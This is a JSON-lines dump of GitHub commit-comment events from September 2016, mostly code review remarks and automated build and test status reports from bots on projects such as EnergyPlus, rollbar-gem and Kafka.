{"id":"4570842653","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19044883,"position":null,"line":null,"path":null,"commit_id":"baea7bcb7db7430fd6431b571b3c3cb78b8afb00","created_at":"2016-09-15T21:25:22Z","updated_at":"2016-09-15T21:25:22Z","body":"#5853-Fancoil-cold/hot-water-control-failed-warnings (rraustad) - x86_64-MacOS-10.9-clang: OK (2328 of 2330 tests passed, 1 test warnings)\n\n * 1 test had: EIO diffs.\n * 1 test had: ESO small diffs.\n * 1 test had: MTR small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-baea7bcb7db7430fd6431b571b3c3cb78b8afb00-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-baea7bcb7db7430fd6431b571b3c3cb78b8afb00-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.91%25-yellow.svg)</a> \n"}},"created_at":"2016-09-15T21:25:22Z"}
{"id":"4570843550","type":"CommitCommentEvent","actor":{"login":"nandomcalister"},"repo":{"name":"nandomcalister/SmartDating"},"payload":{"comment":{"id":19044884,"position":null,"line":null,"path":null,"commit_id":"14a6d060cea9d97632323a718d9249c6cde911fb","created_at":"2016-09-15T21:25:33Z","updated_at":"2016-09-15T21:25:33Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;dkPUsyzd&#x2F;16-10-dev-implementar-login-por-facebook\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> (10)[dev]Implementar Login por Facebook</a>"}},"created_at":"2016-09-15T21:25:33Z"}
{"id":"4570844985","type":"CommitCommentEvent","actor":{"login":"grady404"},"repo":{"name":"cooper-anderson/Blockade"},"payload":{"comment":{"id":19044885,"position":null,"line":null,"path":null,"commit_id":"056c57d08f721fa4bf2930b35424cdb547d87f75","created_at":"2016-09-15T21:25:52Z","updated_at":"2016-09-15T21:25:52Z","body":"Completely forgot to include the version number (even though it is updated in `package.json`), but it is `indev v0.2.29`"}},"created_at":"2016-09-15T21:25:52Z"}
{"id":"4570855166","type":"CommitCommentEvent","actor":{"login":"bhousel"},"repo":{"name":"mapbox/spritezero-cli"},"payload":{"comment":{"id":19044903,"position":null,"line":null,"path":null,"commit_id":"c92587ad69555b050797762044bd415c3d935c1f","created_at":"2016-09-15T21:27:49Z","updated_at":"2016-09-15T21:27:49Z","body":"Ok I published a spritezero-cli 1.1.2 on npm that uses the tilde dependency on spritezero 3.7.0.   I think this should be what you need to avoid a surprise mapnik version bump.\r\n\r\nAlso I did make sure that npm knows spritezero-cli 1.2.0 is tagged as `latest`."}},"created_at":"2016-09-15T21:27:49Z"}
{"id":"4570856275","type":"CommitCommentEvent","actor":{"login":"samrocketman"},"repo":{"name":"travis-ci/travis.rb"},"payload":{"comment":{"id":19044905,"position":12,"line":95,"path":"lib/travis/client/methods.rb","commit_id":"fac4e62024bb5b72fe81da867173598d84345b62","created_at":"2016-09-15T21:28:01Z","updated_at":"2016-09-15T21:28:01Z","body":"Ahhh, thank you so much.  Apologies for being terse.  I felt like I was going down a rabbit hole :)"}},"created_at":"2016-09-15T21:28:01Z"}
{"id":"4570859158","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":19044911,"position":null,"line":null,"path":null,"commit_id":"15f48a34f60e46eef6f68fd3c59a816d36d866e8","created_at":"2016-09-15T21:28:33Z","updated_at":"2016-09-15T21:28:33Z","body":"Interesting experiment! I'm very curious to see the result."}},"created_at":"2016-09-15T21:28:33Z"}
{"id":"4570870371","type":"CommitCommentEvent","actor":{"login":"Amazinite"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":19044935,"position":null,"line":null,"path":null,"commit_id":"04e1166b673c6d38d79ec531fdfc68c132e763ee","created_at":"2016-09-15T21:30:37Z","updated_at":"2016-09-15T21:30:37Z","body":":)\r\nWas scrolling through the files after finished up the story just to see if I missed anything and noticed this."}},"created_at":"2016-09-15T21:30:37Z"}
{"id":"4570872719","type":"CommitCommentEvent","actor":{"login":"garethbowen"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19044946,"position":10,"line":592,"path":"static/css/inbox.less","commit_id":"044f134f89ef1dda288338e2481245367574ca39","created_at":"2016-09-15T21:31:04Z","updated_at":"2016-09-15T21:31:04Z","body":"The less-style way of doing this would be to nest the `a.selected` selector in the preceding `a` block and change it to `&.selected`."}},"created_at":"2016-09-15T21:31:04Z"}
{"id":"4570872735","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19044947,"position":null,"line":null,"path":null,"commit_id":"e3d19a4cbe7168593a0462ea0d81ecf6e10ec8ff","created_at":"2016-09-15T21:31:04Z","updated_at":"2016-09-15T21:31:04Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1188 of 1188 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e3d19a4cbe7168593a0462ea0d81ecf6e10ec8ff-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e3d19a4cbe7168593a0462ea0d81ecf6e10ec8ff-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e3d19a4cbe7168593a0462ea0d81ecf6e10ec8ff-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-35.97%25-green.svg)</a>\n"}},"created_at":"2016-09-15T21:31:04Z"}
{"id":"4570872992","type":"CommitCommentEvent","actor":{"login":"coryvirok"},"repo":{"name":"rollbar/rollbar-gem"},"payload":{"comment":{"id":19044948,"position":32,"line":61,"path":"lib/rollbar.rb","commit_id":"07be56755ca707e8e32756301a82ffe87e4c4412","created_at":"2016-09-15T21:31:08Z","updated_at":"2016-09-15T21:31:08Z","body":"What are these new *configure methods for? "}},"created_at":"2016-09-15T21:31:08Z"}
{"id":"4570873563","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19044951,"position":null,"line":null,"path":null,"commit_id":"f2f2c2eaac4a4f254c589095794f1a5dab7f38cb","created_at":"2016-09-15T21:31:14Z","updated_at":"2016-09-15T21:31:14Z","body":"os_2_0_develop_linux (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-f2f2c2eaac4a4f254c589095794f1a5dab7f38cb-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-f2f2c2eaac4a4f254c589095794f1a5dab7f38cb-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-15T21:31:14Z"}
{"id":"4570874541","type":"CommitCommentEvent","actor":{"login":"EQuimper"},"repo":{"name":"FreeCodeCampCalgary/All-About-JavaScript"},"payload":{"comment":{"id":19044954,"position":null,"line":null,"path":null,"commit_id":"42e245357a0a5c5fb946475261bcd2c57fe47a8b","created_at":"2016-09-15T21:31:26Z","updated_at":"2016-09-15T21:31:26Z","body":"Nice thank you"}},"created_at":"2016-09-15T21:31:26Z"}
{"id":"4570875834","type":"CommitCommentEvent","actor":{"login":"mikermcneil"},"repo":{"name":"node-machine/machine"},"payload":{"comment":{"id":19044964,"position":6,"line":22,"path":"lib/get-combined-error-stack.js","commit_id":"fc00f83e9cd8838ff4860ee5a4a798eff05f3382","created_at":"2016-09-15T21:31:40Z","updated_at":"2016-09-15T21:31:40Z","body":"@sgress454 good check.  And actually, since any time this wouldn't be an array it would be _our code's fault_ (internally in the machine runner impl), let's do an assertion-- e.g.\r\n\r\n```\r\nif (!_.isArray(thisStack) {\r\n  throw new Error('Consistency violation: `getCombinedErrorStack()` was called with invalid arguments.  The first argument should be an array, but instead, got: `'+util.inspect(thisStack, {depth: null})+'`');\r\n}\r\n```"}},"created_at":"2016-09-15T21:31:40Z"}
{"id":"4570876984","type":"CommitCommentEvent","actor":{"login":"xerial"},"repo":{"name":"wvlet/log"},"payload":{"comment":{"id":19044969,"position":null,"line":null,"path":null,"commit_id":"00c9a883348765024c272abba0cadef8b05c6f2b","created_at":"2016-09-15T21:31:54Z","updated_at":"2016-09-15T21:31:54Z","body":"nice catch :)"}},"created_at":"2016-09-15T21:31:54Z"}
{"id":"4570877580","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19044971,"position":null,"line":null,"path":null,"commit_id":"e3d19a4cbe7168593a0462ea0d81ecf6e10ec8ff","created_at":"2016-09-15T21:32:01Z","updated_at":"2016-09-15T21:32:01Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e3d19a4cbe7168593a0462ea0d81ecf6e10ec8ff-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-15T21:32:01Z"}
{"id":"4570877745","type":"CommitCommentEvent","actor":{"login":"whyrusleeping"},"repo":{"name":"Kubuxu/go-reuseport"},"payload":{"comment":{"id":19044972,"position":71,"line":71,"path":"singlepoll/linux.go","commit_id":"01a528c6cf2377ddf496d9df449c73e080e44178","created_at":"2016-09-15T21:32:04Z","updated_at":"2016-09-15T21:32:04Z","body":"lets at least log it then"}},"created_at":"2016-09-15T21:32:04Z"}
{"id":"4570878689","type":"CommitCommentEvent","actor":{"login":"garethbowen"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19044973,"position":5,"line":587,"path":"static/css/inbox.less","commit_id":"044f134f89ef1dda288338e2481245367574ca39","created_at":"2016-09-15T21:32:15Z","updated_at":"2016-09-15T21:32:15Z","body":"Can you change this to a relative value? `em` or `%` are fine. That way it scales proportionally to surrounding elements. I don't think we use `px` or `pt` anywhere in the app currently."}},"created_at":"2016-09-15T21:32:15Z"}
{"id":"4570884743","type":"CommitCommentEvent","actor":{"login":"RunoFawkes"},"repo":{"name":"RunoFawkes/Source-Code-Inspection"},"payload":{"comment":{"id":19044984,"position":null,"line":null,"path":null,"commit_id":"33cfd365e8b003d20814d234957a632060591f3f","created_at":"2016-09-15T21:33:29Z","updated_at":"2016-09-15T21:33:29Z","body":"Tell Travis not to e-mail me"}},"created_at":"2016-09-15T21:33:29Z"}
{"id":"4570885427","type":"CommitCommentEvent","actor":{"login":"coryvirok"},"repo":{"name":"rollbar/rollbar-gem"},"payload":{"comment":{"id":19044985,"position":4,"line":36,"path":"lib/rollbar.rb","commit_id":"07be56755ca707e8e32756301a82ffe87e4c4412","created_at":"2016-09-15T21:33:37Z","updated_at":"2016-09-15T21:33:37Z","body":"Is this the \"global\" notifier instance? If so, I think a better name would be \"root_notifier\" or \"global_notifier\" or \"top_level_notifier\"."}},"created_at":"2016-09-15T21:33:37Z"}
{"id":"4570886810","type":"CommitCommentEvent","actor":{"login":"ijuma"},"repo":{"name":"apache/kafka"},"payload":{"comment":{"id":19044988,"position":8,"line":160,"path":"core/src/test/scala/unit/kafka/utils/UtilsTest.scala","commit_id":"2f930fa76cd79adddec89d6fcab3c13ba57860fc","created_at":"2016-09-15T21:33:54Z","updated_at":"2016-09-15T21:33:54Z","body":"Space after `=`"}},"created_at":"2016-09-15T21:33:54Z"}
{"id":"4570889384","type":"CommitCommentEvent","actor":{"login":"jovo"},"repo":{"name":"neurodata/synaptome-stats"},"payload":{"comment":{"id":19044992,"position":null,"line":null,"path":null,"commit_id":"dd8a71fca12e4d6b9d307767f340c97a39248f9d","created_at":"2016-09-15T21:34:26Z","updated_at":"2016-09-15T21:34:26Z","body":"whoa, these look great.\ncan you sort them by \"excitatoriness\"\nand also use the color code to indicate excitatory ness?\n\nand can you do the same for K=6?\nand also for VVV?\n\nthank you!\n\nOn Thu, Sep 15, 2016 at 5:10 PM, Jesse Leigh Patsolic <\nnotifications@github.com> wrote:\n\n> @jovo <https://github.com/jovo> Heat maps and covariance plots\n> <http://docs.neurodata.io/synaptome-stats/Code/BIC.html#heat-maps-of-cluster-means>\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/neurodata/synaptome-stats/commit/dd8a71fca12e4d6b9d307767f340c97a39248f9d#commitcomment-19044686>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AACjcubG-YYnemdKb9VLxQpm8-zOrwRQks5qqbQpgaJpZM4J-WxL>\n> .\n>\n\n\n\n-- \nthe glass is all full:  half water, half air.\nneurodata.io, jovo calendar\n<https://calendar.google.com/calendar/embed?src=joshuav%40gmail.com&ctz=America/New_York>\n"}},"created_at":"2016-09-15T21:34:26Z"}
{"id":"4570889965","type":"CommitCommentEvent","actor":{"login":"rodrigojob"},"repo":{"name":"stavarengo/php-sigep"},"payload":{"comment":{"id":19044994,"position":null,"line":null,"path":null,"commit_id":"361ef8c12878efc45b964d54cee3f1c79a349890","created_at":"2016-09-15T21:34:32Z","updated_at":"2016-09-15T21:34:32Z","body":"Olá,\r\nclonei agora e utilizando o exemplo encontrei uma divergência de onde se tira os dados do número da diretoria.\r\nPercebi que a linha 115 faz-se de:\r\n$writer->writeElement('numero_diretoria', $data->getRemetente()->getDiretoria()->getNumero());\r\npara:\r\n$writer->writeElement('numero_diretoria', $data->getAccessData()->getDiretoria()->getNumero());  \r\n\r\nLembrando que estou usando o exemplos\\fechaPlpVariosServicos.php.\r\n\r\n"}},"created_at":"2016-09-15T21:34:32Z"}
{"id":"4570892080","type":"CommitCommentEvent","actor":{"login":"mikermcneil"},"repo":{"name":"node-machine/machine"},"payload":{"comment":{"id":19045000,"position":6,"line":15,"path":"lib/remove-non-userland-calls-from-stack.js","commit_id":"6c9aed934aea960c8952faee24161b545ce533cf","created_at":"2016-09-15T21:34:58Z","updated_at":"2016-09-15T21:34:58Z","body":"@sgress454 what prompted the \"files in Node core\" check?  Assuming this is running on every error stack that gets built through normal use of machines, It sounds like if we do this, it's something we might need to expose as a configuration option.  I could be missing something though"}},"created_at":"2016-09-15T21:34:58Z"}
{"id":"4570892400","type":"CommitCommentEvent","actor":{"login":"jondeandres"},"repo":{"name":"rollbar/rollbar-gem"},"payload":{"comment":{"id":19045001,"position":32,"line":61,"path":"lib/rollbar.rb","commit_id":"07be56755ca707e8e32756301a82ffe87e4c4412","created_at":"2016-09-15T21:35:02Z","updated_at":"2016-09-15T21:35:02Z","body":"They are really not new. But in #519 I moved them from `Rollbar` to `Rollbar::Notifier` and then `Rollbar` delegated those methods to the current thread's notifier.\r\n\r\nBefore #519, those methods just mutated `Rollbar.configuration`, being the owner `Rollbar`. With this change we always cache the notifier created when calling any of those methods. With this we can then pass it to `Notifier.new` when a new thread is spawned.\r\n\r\nSo, after merging #519 we lost that parent-child relation and the notifiers created for new thread didn't have the global configuration."}},"created_at":"2016-09-15T21:35:02Z"}
{"id":"4570893369","type":"CommitCommentEvent","actor":{"login":"coryvirok"},"repo":{"name":"rollbar/rollbar-gem"},"payload":{"comment":{"id":19045005,"position":39,"line":67,"path":"lib/rollbar.rb","commit_id":"07be56755ca707e8e32756301a82ffe87e4c4412","created_at":"2016-09-15T21:35:14Z","updated_at":"2016-09-15T21:35:14Z","body":"Is this right? It seems like we want to configure the thread's notifier instance and not the global notifier."}},"created_at":"2016-09-15T21:35:14Z"}
{"id":"4570893375","type":"CommitCommentEvent","actor":{"login":"pkindalov"},"repo":{"name":"pkindalov/MyCSharpUsefulMethods"},"payload":{"comment":{"id":19045006,"position":null,"line":null,"path":null,"commit_id":"9256c4c43dec63ce56a5f120c3e415c60b8ef85d","created_at":"2016-09-15T21:35:14Z","updated_at":"2016-09-15T21:35:14Z","body":"#MyCSharpUsefulMethods\r\n####Different methods in C Sharp"}},"created_at":"2016-09-15T21:35:14Z"}
{"id":"4570893856","type":"CommitCommentEvent","actor":{"login":"sgress454"},"repo":{"name":"node-machine/machine"},"payload":{"comment":{"id":19045008,"position":6,"line":22,"path":"lib/get-combined-error-stack.js","commit_id":"fc00f83e9cd8838ff4860ee5a4a798eff05f3382","created_at":"2016-09-15T21:35:20Z","updated_at":"2016-09-15T21:35:20Z","body":"@mikermcneil I thought about that.  How about a `console.error()` instead?  My concern was that in the future something in Node could change (or there could be some undiscovered edge case) that breaks this functionality, but which doesn't affect the ability of the machine runner to do its actual job.  I'd rather not have it crash under that circumstance, but a nice loud error message would hopefully encourage someone to post an issue about it."}},"created_at":"2016-09-15T21:35:20Z"}
{"id":"4570894427","type":"CommitCommentEvent","actor":{"login":"jondeandres"},"repo":{"name":"rollbar/rollbar-gem"},"payload":{"comment":{"id":19045010,"position":4,"line":36,"path":"lib/rollbar.rb","commit_id":"07be56755ca707e8e32756301a82ffe87e4c4412","created_at":"2016-09-15T21:35:27Z","updated_at":"2016-09-15T21:35:27Z","body":"Ok nice, I'll change it to `root_notifier`."}},"created_at":"2016-09-15T21:35:27Z"}
{"id":"4570895345","type":"CommitCommentEvent","actor":{"login":"ijuma"},"repo":{"name":"apache/kafka"},"payload":{"comment":{"id":19045011,"position":8,"line":160,"path":"core/src/test/scala/unit/kafka/utils/UtilsTest.scala","commit_id":"2f930fa76cd79adddec89d6fcab3c13ba57860fc","created_at":"2016-09-15T21:35:35Z","updated_at":"2016-09-15T21:35:35Z","body":"You can have this as a method in `CoreUtils` and name it `bytesFromUuid`. It can then be used in `generateUuidAsBase64`"}},"created_at":"2016-09-15T21:35:35Z"}
{"id":"4570900391","type":"CommitCommentEvent","actor":{"login":"willemarcel"},"repo":{"name":"ibamacsr/sentinelsat"},"payload":{"comment":{"id":19045022,"position":66,"line":71,"path":"sentinelsat/sentinel.py","commit_id":"d0f63e25771c441b4d778c8c257e3432810e1b8e","created_at":"2016-09-15T21:36:38Z","updated_at":"2016-09-15T21:36:38Z","body":"@valgur is this line correct? We are having an error in the Python 2 tests https://travis-ci.org/ibamacsr/sentinelsat/jobs/160270409"}},"created_at":"2016-09-15T21:36:38Z"}
{"id":"4570900762","type":"CommitCommentEvent","actor":{"login":"Pyroseza"},"repo":{"name":"Pyroseza/unicorn-hat"},"payload":{"comment":{"id":19045025,"position":null,"line":null,"path":null,"commit_id":"cdc1c0c65f7a062f15792133b2d466fdc83504a5","created_at":"2016-09-15T21:36:42Z","updated_at":"2016-09-15T21:36:42Z","body":"Now does random colours instead of just white light"}},"created_at":"2016-09-15T21:36:42Z"}
{"id":"4570901498","type":"CommitCommentEvent","actor":{"login":"WaffleTard"},"repo":{"name":"jwiegley/emacs-async"},"payload":{"comment":{"id":19045026,"position":4,"line":60,"path":"README.md","commit_id":"b962cbfd825ce2d8ee8414e82c27370ff112e3c1","created_at":"2016-09-15T21:36:50Z","updated_at":"2016-09-15T21:36:50Z","body":"\"Null\"_ignore"}},"created_at":"2016-09-15T21:36:50Z"}
{"id":"4570903710","type":"CommitCommentEvent","actor":{"login":"jondeandres"},"repo":{"name":"rollbar/rollbar-gem"},"payload":{"comment":{"id":19045032,"position":39,"line":67,"path":"lib/rollbar.rb","commit_id":"07be56755ca707e8e32756301a82ffe87e4c4412","created_at":"2016-09-15T21:37:16Z","updated_at":"2016-09-15T21:37:16Z","body":"This method is called once when the users configure the gem. We use the global notifier here so we store it for later uses. For example when a new thread is created.\r\n\r\nThis is the behavior we had before #519. The configuration for the current notifier can be changed with `Rollbar.notifier.configure`. Or within a block with `Rollbar.with_config(overrides) do`"}},"created_at":"2016-09-15T21:37:16Z"}
{"id":"4570903940","type":"CommitCommentEvent","actor":{"login":"WaffleTard"},"repo":{"name":"jwiegley/emacs-async"},"payload":{"comment":{"id":19045033,"position":6,"line":60,"path":"README.md","commit_id":"b962cbfd825ce2d8ee8414e82c27370ff112e3c1","created_at":"2016-09-15T21:37:19Z","updated_at":"2016-09-15T21:37:19Z","body":"\"Null\"_ignore"}},"created_at":"2016-09-15T21:37:19Z"}
{"id":"4570907573","type":"CommitCommentEvent","actor":{"login":"DM-Games"},"repo":{"name":"DK-GameLabs/GameCollab"},"payload":{"comment":{"id":19045044,"position":null,"line":null,"path":null,"commit_id":"66bb0819d8dd786826f43cf4d1afe397e5c9c02e","created_at":"2016-09-15T21:38:02Z","updated_at":"2016-09-15T21:38:02Z","body":"This comment is just a test :)\r\nim seeing if this all syncs\r\n"}},"created_at":"2016-09-15T21:38:02Z"}
{"id":"4570907774","type":"CommitCommentEvent","actor":{"login":"xc-racer99"},"repo":{"name":"lollipopi9000/android_hardware_samsung"},"payload":{"comment":{"id":19045046,"position":null,"line":null,"path":null,"commit_id":"3229b1298d6431d06186c6503afc462311ce0f65","created_at":"2016-09-15T21:38:05Z","updated_at":"2016-09-15T21:38:05Z","body":"Note that while this fixes the build, hardware encoding/decoding doesn't work (at least in AOSP)"}},"created_at":"2016-09-15T21:38:05Z"}
{"id":"4570908700","type":"CommitCommentEvent","actor":{"login":"WaffleTard"},"repo":{"name":"jwiegley/emacs-async"},"payload":{"comment":{"id":19045048,"position":6,"line":60,"path":"README.md","commit_id":"b962cbfd825ce2d8ee8414e82c27370ff112e3c1","created_at":"2016-09-15T21:38:14Z","updated_at":"2016-09-15T21:38:14Z","body":"\"Null\"_igmore"}},"created_at":"2016-09-15T21:38:14Z"}
{"id":"4570909326","type":"CommitCommentEvent","actor":{"login":"xinzweb"},"repo":{"name":"d/bug-free-fortnight"},"payload":{"comment":{"id":19045050,"position":null,"line":null,"path":null,"commit_id":"f2d3d3bdac67b0d635bf274eebd8051c563c6dd7","created_at":"2016-09-15T21:38:23Z","updated_at":"2016-09-15T21:38:23Z","body":"Hmm, actually I want to see the output if the `env DEBUG=1` is there. Any way to output all the logs? I like logs."}},"created_at":"2016-09-15T21:38:23Z"}
{"id":"4570911367","type":"CommitCommentEvent","actor":{"login":"WaffleTard"},"repo":{"name":"jwiegley/emacs-async"},"payload":{"comment":{"id":19045054,"position":4,"line":60,"path":"README.md","commit_id":"b962cbfd825ce2d8ee8414e82c27370ff112e3c1","created_at":"2016-09-15T21:38:48Z","updated_at":"2016-09-15T21:38:48Z","body":"\"Null\"_ignore"}},"created_at":"2016-09-15T21:38:48Z"}
{"id":"4570911526","type":"CommitCommentEvent","actor":{"login":"Fridgey"},"repo":{"name":"Synapz1/Paintball"},"payload":{"comment":{"id":19045055,"position":4,"line":4,"path":"changelog.txt","commit_id":"c3fd2aed75f81c336430c34f7fb5375cd25eeb48","created_at":"2016-09-15T21:38:50Z","updated_at":"2016-09-15T21:38:50Z","body":"What? It's not my fault you can't build it -.-"}},"created_at":"2016-09-15T21:38:50Z"}
{"id":"4570912872","type":"CommitCommentEvent","actor":{"login":"vdumont"},"repo":{"name":"mapbox/spritezero-cli"},"payload":{"comment":{"id":19045058,"position":null,"line":null,"path":null,"commit_id":"c92587ad69555b050797762044bd415c3d935c1f","created_at":"2016-09-15T21:39:06Z","updated_at":"2016-09-15T21:39:06Z","body":"@bhousel Yep perfect, thank you very much! "}},"created_at":"2016-09-15T21:39:06Z"}
{"id":"4570925563","type":"CommitCommentEvent","actor":{"login":"JBYoshi"},"repo":{"name":"DemonWav/MinecraftDevIntelliJ"},"payload":{"comment":{"id":19045083,"position":10,"line":10,"path":"src/main/java/com/demonwav/mcdev/update/Channels.java","commit_id":"d9efde22047f66bf5df940c12a2a8d5ab6f62939","created_at":"2016-09-15T21:41:23Z","updated_at":"2016-09-15T21:41:23Z","body":"\"Scotlin\" (at least to me) sounds like Scotland with a Scottish accent."}},"created_at":"2016-09-15T21:41:23Z"}
{"id":"4570928678","type":"CommitCommentEvent","actor":{"login":"jedmccaleb"},"repo":{"name":"stellar/stellar-core"},"payload":{"comment":{"id":19045087,"position":null,"line":null,"path":null,"commit_id":"091f7fcdf0d3cae8569b414d7722966b44c316b1","created_at":"2016-09-15T21:41:59Z","updated_at":"2016-09-15T21:41:59Z","body":"r+"}},"created_at":"2016-09-15T21:41:59Z"}
{"id":"4570928728","type":"CommitCommentEvent","actor":{"login":"navisingh14"},"repo":{"name":"navisingh14/Spoon-Knife"},"payload":{"comment":{"id":19045088,"position":null,"line":null,"path":null,"commit_id":"e2dd710d1ca6d680017fca06d8cf0ad6605613aa","created_at":"2016-09-15T21:42:00Z","updated_at":"2016-09-15T21:42:00Z","body":"test si"}},"created_at":"2016-09-15T21:42:00Z"}
{"id":"4570929065","type":"CommitCommentEvent","actor":{"login":"fpvandoorn"},"repo":{"name":"leanprover/lean"},"payload":{"comment":{"id":19045089,"position":11,"line":11,"path":"tests/lean/run/let3.lean","commit_id":"0b90ace9f8b284b7ef96d826a42842ac58dcadec","created_at":"2016-09-15T21:42:04Z","updated_at":"2016-09-15T21:42:04Z","body":"@leodemoura: ok, that makes sense. It is indeed again a big thing to implement for not too much gain.\r\n\r\nAbout the original question, I don't have a strong opinion. `let` is confusing, but all other suggestions look weird.\r\n\r\n"}},"created_at":"2016-09-15T21:42:04Z"}
{"id":"4570936741","type":"CommitCommentEvent","actor":{"login":"vincent-legoll"},"repo":{"name":"igorpecovnik/lib"},"payload":{"comment":{"id":19045099,"position":9,"line":415,"path":"general.sh","commit_id":"9addd2d4b6f0abbf42aefc3076f4e0a41d1b0edd","created_at":"2016-09-15T21:43:36Z","updated_at":"2016-09-15T21:43:36Z","body":"could have put ${} here too..."}},"created_at":"2016-09-15T21:43:36Z"}
{"id":"4570940355","type":"CommitCommentEvent","actor":{"login":"huancone"},"repo":{"name":"huancone/Proyecto-de-Implementacion-AES"},"payload":{"comment":{"id":19045108,"position":33,"line":56,"path":"B2C/B2CTouresBalon/B2CTouresBalon/Controllers/OrdenController.cs","commit_id":"5f6a9554beebf1bcbfb0f73204b42a5446bf8fed","created_at":"2016-09-15T21:44:19Z","updated_at":"2016-09-15T21:44:19Z","body":"Guarda las ordenes en MEMCACHED\r\n\r\n//configuracion.\r\nvar clientConfiguration = new MemcachedClientConfiguration { Protocol = MemcachedProtocol.Binary };\r\nclientConfiguration.Servers.Add(new IPEndPoint(IPAddress.Parse(\"127.0.0.1\"), 32768));\r\n\r\n//uso\r\nusing (var client = new MemcachedClient(clientConfiguration))\r\n     {\r\n          //consulto el cache del usuario logueado Order-es un prefijo para guardar la llave.\r\n          var order = client.Get<Order>(\"Order-\" + currentUser.UserName);\r\n          client.Store(StoreMode.Set, \"Order-\" + currentUser.UserName, order);\r\n     }\r\n"}},"created_at":"2016-09-15T21:44:19Z"}
{"id":"4570940470","type":"CommitCommentEvent","actor":{"login":"alexmancheno"},"repo":{"name":"alexmancheno/OOP-in-C-Course-Assignments"},"payload":{"comment":{"id":19045109,"position":null,"line":null,"path":null,"commit_id":"8f89ef4696a077c8e819a838241cbd071b1fdd5d","created_at":"2016-09-15T21:44:20Z","updated_at":"2016-09-15T21:44:20Z","body":"Okay yeah now I get it- it's impossible to place a queen on q[8], so it will always backtrack to columns 0-7 correctly. Pretty interesting.. thanks for helping out here man!"}},"created_at":"2016-09-15T21:44:20Z"}
{"id":"4570942339","type":"CommitCommentEvent","actor":{"login":"andrewdacenko"},"repo":{"name":"br-dr/best-friends"},"payload":{"comment":{"id":19045115,"position":10,"line":10,"path":"client/components/profile-public/profile-public.controller.js","commit_id":"34467e1ae0c631a0584acc96e4fa8a25011c42af","created_at":"2016-09-15T21:44:43Z","updated_at":"2016-09-15T21:44:43Z","body":"unused `$http`"}},"created_at":"2016-09-15T21:44:43Z"}
{"id":"4570943463","type":"CommitCommentEvent","actor":{"login":"WaffleTard"},"repo":{"name":"melpa/melpa"},"payload":{"comment":{"id":19045120,"position":1,"line":1,"path":"recipes/aa-edit-mode","commit_id":"6b5791b05656ddb67cc69c0c7c4179adde1f986f","created_at":"2016-09-15T21:44:57Z","updated_at":"2016-09-15T21:44:57Z","body":"\"Null\"_github"}},"created_at":"2016-09-15T21:44:57Z"}
{"id":"4570944532","type":"CommitCommentEvent","actor":{"login":"latobarita"},"repo":{"name":"stellar/stellar-core"},"payload":{"comment":{"id":19045122,"position":null,"line":null,"path":null,"commit_id":"091f7fcdf0d3cae8569b414d7722966b44c316b1","created_at":"2016-09-15T21:45:10Z","updated_at":"2016-09-15T21:45:10Z","body":"saw approval from jedmccaleb\nat https://github.com/stellar/stellar-core/commit/091f7fcdf0d3cae8569b414d7722966b44c316b1"}},"created_at":"2016-09-15T21:45:10Z"}
{"id":"4570944555","type":"CommitCommentEvent","actor":{"login":"latobarita"},"repo":{"name":"stellar/stellar-core"},"payload":{"comment":{"id":19045123,"position":null,"line":null,"path":null,"commit_id":"091f7fcdf0d3cae8569b414d7722966b44c316b1","created_at":"2016-09-15T21:45:10Z","updated_at":"2016-09-15T21:45:10Z","body":"merging stellar/stellar-core/dm/man = 091f7fcd into auto"}},"created_at":"2016-09-15T21:45:10Z"}
